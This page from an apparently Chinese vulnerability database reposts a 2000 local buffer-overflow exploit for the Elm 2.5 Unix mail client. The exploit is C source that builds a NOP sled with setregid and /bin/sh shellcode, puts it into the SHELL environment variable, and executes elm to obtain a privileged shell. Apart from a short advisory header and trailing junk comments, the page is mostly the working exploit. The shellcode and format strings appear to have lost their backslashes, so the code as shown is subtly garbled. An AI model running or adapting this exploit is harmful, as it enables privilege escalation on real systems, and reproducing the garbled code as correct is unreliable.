Elm Development Group ELM 2.4/2.5.1 Mail for UNIX – ELM Buffer Overflow (2)
漏洞ID | 1053446 | 漏洞类型 | |
发布时间 | 2000-05-27 | 更新时间 | 2000-05-27 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Unix | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/1276/info
Buffer overflow vulnerabilities exist in elm (Electronic Mail for Unix).
/*
Elm 2.5 PL3 exploit
Tested Under Linux Slackware 3.6, 4.0, 7.0
By xfer ([email protected])
Of Buffer0verfl0w Security
At Sat May 27 18:52:14 CEST 2000
HowTo: Hmmm.. Ya have to play with offset.
MoreInfo: Elm is shit, it has bug in each option or function ;>.
*/
#include <stdio.h>
#include <unistd.h>
#define PATH "/usr/local/bin/elm"
#define BUFFER 256
#define NOP 0x90
/* setregid + generic shell code */
char shellcode[] = "x31xdbx31xc9xbbxffxffxffxffxb1x0cx31xc0xb0"
"x47xcdx80x31xdbx31xc9xb3x0cxb1x0cx31xc0xb0"
"x47xcdx80xebx1fx5ex89x76x08x31xc0x88x46x07"
"x89x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0cxcd"
"x80x31xdbx89xd8x40xcdx80xe8xdcxffxffxffx2f"
"x62x69x6ex2fx73x68";
unsigned long get_esp(void) {
__asm__("movl %esp, %eax");
}
int main(int argc,char *argv[]){
char buff[BUFFER];
int x,offset=0;
long address;
if(argc>1) offset=atoi(argv[1]);
address = get_esp() + offset;
fprintf(stderr,"Address: 0x%lxnOffset: %dnShellSize: %dn",address,offset,strlen(shellcode));
for(x=3;x<BUFFER;x+=4) *(int *)&buff[x]=address;
for(x=0;x<(BUFFER-strlen(shellcode));x++) buff[x]=NOP;
memcpy(buff+(BUFFER-strlen(shellcode)),shellcode,strlen(shellcode));
setenv("SHELL",buff,1);
if((execl(PATH,"elm",0)) < 0) fprintf(stderr,"Kurwa Mac! No %s file ?n",PATH);
return 0;
}
相关推荐: Check Point Software Firewall-1 3.0/1 4.0 – Session Agent Impersonation
Check Point Software Firewall-1 3.0/1 4.0 – Session Agent Impersonation 漏洞ID 1053375 漏洞类型 发布时间 1998-09-24 更新时间 1998-09-24 CVE编号 N/…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666